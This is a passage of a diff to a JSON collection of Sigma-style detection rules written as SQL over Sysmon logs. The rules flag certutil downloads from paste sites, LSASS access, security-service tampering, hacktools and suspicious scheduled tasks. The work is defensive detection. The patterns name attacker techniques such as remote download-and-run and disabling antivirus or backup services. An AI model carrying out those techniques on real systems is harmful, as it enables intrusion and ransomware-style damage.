'\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" + "filename": "proc_creation_win_pua_advancedrun.yml" }, { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "status": "experimental", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Unusual Parent Process For Cmd.EXE", + "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious parent process for cmd.exe", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_cmd_unusual_parent.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Suspicious ScreenSave Change by Reg.exe", + "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "author": "frack113", + "tags": [ + "attack.privilege_escalation", + "attack.t1546.002" + ], + "falsepositives": [ + "GPO" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_reg_screensaver.yml" + }, + { + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", + "status": "test", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1489" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_tamper.yml" + "filename": "proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "Computer System Reconnaissance Via Wmic.EXE", - "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", - "status": "experimental", - "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential DLL Injection Or Execution Using Tracker.exe", + "id": "148431ce-4b70-403d-8525-fcc2993f29ea", + "status": "test", + "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmic_recon_computersystem.yml" + "filename": "proc_creation_win_lolbin_tracker.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR 